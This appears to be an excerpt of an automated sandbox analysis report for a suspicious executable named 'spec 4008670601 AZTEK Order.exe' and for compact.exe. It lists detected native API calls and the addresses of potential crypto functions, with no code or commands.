Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2F30 NtCreateSection,	6_2_017E2F30
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2FE0 NtCreateFile,	6_2_017E2FE0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2FB0 NtResumeThread,	6_2_017E2FB0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2FA0 NtQuerySection,	6_2_017E2FA0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2F90 NtProtectVirtualMemory,	6_2_017E2F90
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2E30 NtWriteVirtualMemory,	6_2_017E2E30
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2EE0 NtQueueApcThread,	6_2_017E2EE0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2EA0 NtAdjustPrivilegesToken,	6_2_017E2EA0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2E80 NtReadVirtualMemory,	6_2_017E2E80
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E3010 NtOpenDirectoryObject,	6_2_017E3010
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E3090 NtSetValueKey,	6_2_017E3090
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E39B0 NtGetContextThread,	6_2_017E39B0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E3D70 NtOpenThread,	6_2_017E3D70
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E3D10 NtOpenProcessToken,	6_2_017E3D10
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03744340 NtSetContextThread,LdrInitializeThunk,	12_2_03744340
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03744650 NtSuspendThread,LdrInitializeThunk,	12_2_03744650
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742B60 NtClose,LdrInitializeThunk,	12_2_03742B60
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	12_2_03742BF0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742BE0 NtQueryValueKey,LdrInitializeThunk,	12_2_03742BE0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742BA0 NtEnumerateValueKey,LdrInitializeThunk,	12_2_03742BA0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742AF0 NtWriteFile,LdrInitializeThunk,	12_2_03742AF0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742AD0 NtReadFile,LdrInitializeThunk,	12_2_03742AD0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742F30 NtCreateSection,LdrInitializeThunk,	12_2_03742F30
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742FE0 NtCreateFile,LdrInitializeThunk,	12_2_03742FE0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742FB0 NtResumeThread,LdrInitializeThunk,	12_2_03742FB0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742EE0 NtQueueApcThread,LdrInitializeThunk,	12_2_03742EE0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742E80 NtReadVirtualMemory,LdrInitializeThunk,	12_2_03742E80
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742D30 NtUnmapViewOfSection,LdrInitializeThunk,	12_2_03742D30
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742D10 NtMapViewOfSection,LdrInitializeThunk,	12_2_03742D10
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742DF0 NtQuerySystemInformation,LdrInitializeThunk,	12_2_03742DF0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742DD0 NtDelayExecution,LdrInitializeThunk,	12_2_03742DD0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742C70 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_03742C70
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742C60 NtCreateKey,LdrInitializeThunk,	12_2_03742C60
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742CA0 NtQueryInformationToken,LdrInitializeThunk,	12_2_03742CA0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037435C0 NtCreateMutant,LdrInitializeThunk,	12_2_037435C0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037439B0 NtGetContextThread,LdrInitializeThunk,	12_2_037439B0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742B80 NtQueryInformationFile,	12_2_03742B80
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742AB0 NtWaitForSingleObject,	12_2_03742AB0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742F60 NtCreateProcessEx,	12_2_03742F60
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742FA0 NtQuerySection,	12_2_03742FA0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742F90 NtProtectVirtualMemory,	12_2_03742F90
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742E30 NtWriteVirtualMemory,	12_2_03742E30
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742EA0 NtAdjustPrivilegesToken,	12_2_03742EA0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742D00 NtSetInformationFile,	12_2_03742D00
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742DB0 NtEnumerateKey,	12_2_03742DB0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742C00 NtQueryInformationProcess,	12_2_03742C00
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742CF0 NtOpenProcess,	12_2_03742CF0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03742CC0 NtQueryVirtualMemory,	12_2_03742CC0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03743010 NtOpenDirectoryObject,	12_2_03743010
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03743090 NtSetValueKey,	12_2_03743090
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03743D70 NtOpenThread,	12_2_03743D70
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03743D10 NtOpenProcessToken,	12_2_03743D10
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DE82E0 NtClose,	12_2_02DE82E0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DE8250 NtDeleteFile,	12_2_02DE8250
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DE8010 NtCreateFile,	12_2_02DE8010
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DE8170 NtReadFile,	12_2_02DE8170
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DE8430 NtAllocateVirtualMemory,	12_2_02DE8430

Detected potential crypto function

Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_00B9D364	0_2_00B9D364
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_04880C50	0_2_04880C50
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_04886DD8	0_2_04886DD8
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_04881600	0_2_04881600
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_04886138	0_2_04886138
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_04881AF8	0_2_04881AF8
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_06DA72F0	0_2_06DA72F0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_06DA1060	0_2_06DA1060
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_06DA7F28	0_2_06DA7F28
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_06DA3D50	0_2_06DA3D50
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_06DA8788	0_2_06DA8788
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_06DA877B	0_2_06DA877B
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_06DA8779	0_2_06DA8779
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_06DA2450	0_2_06DA2450
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_06DA2460	0_2_06DA2460
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_06DAF238	0_2_06DAF238
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_06DA3EE3	0_2_06DA3EE3
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_06DA0F89	0_2_06DA0F89
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_06DA7F18	0_2_06DA7F18
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_06DA3D42	0_2_06DA3D42
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_06DA7978	0_2_06DA7978
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_06DA7967	0_2_06DA7967
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_06DA1918	0_2_06DA1918
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 0_2_06DA190A	0_2_06DA190A
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_004010B0	6_2_004010B0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_00403140	6_2_00403140
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0041020A	6_2_0041020A
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_00410213	6_2_00410213
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0042DAB3	6_2_0042DAB3
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_00416B61	6_2_00416B61
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_00416B63	6_2_00416B63
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_00402460	6_2_00402460
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_00410433	6_2_00410433
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0040E4B3	6_2_0040E4B3
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_00402660	6_2_00402660
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0040E68E	6_2_0040E68E
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_018641A2	6_2_018641A2
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_018701AA	6_2_018701AA
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_018681CC	6_2_018681CC
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017A0100	6_2_017A0100
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0184A118	6_2_0184A118
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_01838158	6_2_01838158
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_01842000	6_2_01842000
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_018703E6	6_2_018703E6
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017BE3F0	6_2_017BE3F0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0186A352	6_2_0186A352
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_018302C0	6_2_018302C0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_01850274	6_2_01850274
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_01870591	6_2_01870591
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017B0535	6_2_017B0535
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0185E4F6	6_2_0185E4F6
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_01854420	6_2_01854420
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_01862446	6_2_01862446
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017B0770	6_2_017B0770
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017D4750	6_2_017D4750
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017AC7C0	6_2_017AC7C0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017CC6E0	6_2_017CC6E0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017C6962	6_2_017C6962
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0187A9A6	6_2_0187A9A6
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017B29A0	6_2_017B29A0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017BA840	6_2_017BA840
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017B2840	6_2_017B2840
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017DE8F0	6_2_017DE8F0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017968B8	6_2_017968B8
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_01866BD7	6_2_01866BD7
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0186AB40	6_2_0186AB40
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017AEA80	6_2_017AEA80
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017BAD00	6_2_017BAD00
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017AADE0	6_2_017AADE0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0184CD1F	6_2_0184CD1F
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017C8DBF	6_2_017C8DBF
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_01850CB5	6_2_01850CB5
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017B0C00	6_2_017B0C00
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017A0CF2	6_2_017A0CF2
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0182EFA0	6_2_0182EFA0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017D0F30	6_2_017D0F30
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017F2F28	6_2_017F2F28
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017BCFE0	6_2_017BCFE0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017A2FC8	6_2_017A2FC8
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_01852F30	6_2_01852F30
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_01824F40	6_2_01824F40
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0186CE93	6_2_0186CE93
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017B0E59	6_2_017B0E59
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0186EEDB	6_2_0186EEDB
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0186EE26	6_2_0186EE26
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017C2E90	6_2_017C2E90
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0179F172	6_2_0179F172
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E516C	6_2_017E516C
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017BB1B0	6_2_017BB1B0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0187B16B	6_2_0187B16B
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0185F0CC	6_2_0185F0CC
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0186F0E0	6_2_0186F0E0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_018670E9	6_2_018670E9
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017B70C0	6_2_017B70C0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0179D34C	6_2_0179D34C
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0186132D	6_2_0186132D
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017F739A	6_2_017F739A
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_018512ED	6_2_018512ED
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017CB2C0	6_2_017CB2C0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017B52A0	6_2_017B52A0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0184D5B0	6_2_0184D5B0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_01867571	6_2_01867571
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017A1460	6_2_017A1460
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0186F43F	6_2_0186F43F
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0186F7B0	6_2_0186F7B0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_018616CC	6_2_018616CC
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017F5630	6_2_017F5630
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017B9950	6_2_017B9950
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017CB950	6_2_017CB950
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_01845910	6_2_01845910
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0181D800	6_2_0181D800
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017B38E0	6_2_017B38E0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_01825BF0	6_2_01825BF0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017EDBF9	6_2_017EDBF9
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0186FB76	6_2_0186FB76
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017CFB80	6_2_017CFB80
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_01851AA3	6_2_01851AA3
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0184DAAC	6_2_0184DAAC
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0185DAC6	6_2_0185DAC6
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_01867A46	6_2_01867A46
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0186FA49	6_2_0186FA49
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017F5AA0	6_2_017F5AA0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_01823A6C	6_2_01823A6C
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017B3D40	6_2_017B3D40
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017CFDC0	6_2_017CFDC0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_01861D5A	6_2_01861D5A
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_01867D73	6_2_01867D73
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0186FCF2	6_2_0186FCF2
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_01829C32	6_2_01829C32
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0186FFB1	6_2_0186FFB1
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0186FF09	6_2_0186FF09
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017B1F92	6_2_017B1F92
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017B9EB0	6_2_017B9EB0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037CA352	12_2_037CA352
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_0371E3F0	12_2_0371E3F0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037D03E6	12_2_037D03E6
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037B0274	12_2_037B0274
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037902C0	12_2_037902C0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03798158	12_2_03798158
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037AA118	12_2_037AA118
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03700100	12_2_03700100
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037C81CC	12_2_037C81CC
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037D01AA	12_2_037D01AA
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037C41A2	12_2_037C41A2
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037A2000	12_2_037A2000
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03710770	12_2_03710770
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03734750	12_2_03734750
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_0370C7C0	12_2_0370C7C0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_0372C6E0	12_2_0372C6E0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03710535	12_2_03710535
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037D0591	12_2_037D0591
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037C2446	12_2_037C2446
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037B4420	12_2_037B4420
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037BE4F6	12_2_037BE4F6
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037CAB40	12_2_037CAB40
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037C6BD7	12_2_037C6BD7
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_0370EA80	12_2_0370EA80
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03726962	12_2_03726962
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037129A0	12_2_037129A0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037DA9A6	12_2_037DA9A6
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_0371A840	12_2_0371A840
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03712840	12_2_03712840
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_0373E8F0	12_2_0373E8F0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_036F68B8	12_2_036F68B8
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03784F40	12_2_03784F40
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03730F30	12_2_03730F30
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037B2F30	12_2_037B2F30
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03752F28	12_2_03752F28
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_0371CFE0	12_2_0371CFE0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03702FC8	12_2_03702FC8
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_0378EFA0	12_2_0378EFA0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03710E59	12_2_03710E59
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037CEE26	12_2_037CEE26
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037CEEDB	12_2_037CEEDB
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03722E90	12_2_03722E90
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037CCE93	12_2_037CCE93
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037ACD1F	12_2_037ACD1F
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_0371AD00	12_2_0371AD00
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_0370ADE0	12_2_0370ADE0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03728DBF	12_2_03728DBF
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03710C00	12_2_03710C00
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03700CF2	12_2_03700CF2
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037B0CB5	12_2_037B0CB5
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_036FD34C	12_2_036FD34C
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037C132D	12_2_037C132D
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_0375739A	12_2_0375739A
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037B12ED	12_2_037B12ED
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_0372B2C0	12_2_0372B2C0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037152A0	12_2_037152A0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037DB16B	12_2_037DB16B
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_0374516C	12_2_0374516C
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_036FF172	12_2_036FF172
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_0371B1B0	12_2_0371B1B0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037C70E9	12_2_037C70E9
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037CF0E0	12_2_037CF0E0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037170C0	12_2_037170C0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037BF0CC	12_2_037BF0CC
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037CF7B0	12_2_037CF7B0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03755630	12_2_03755630
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037C16CC	12_2_037C16CC
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037C7571	12_2_037C7571
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037D95C3	12_2_037D95C3
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037AD5B0	12_2_037AD5B0
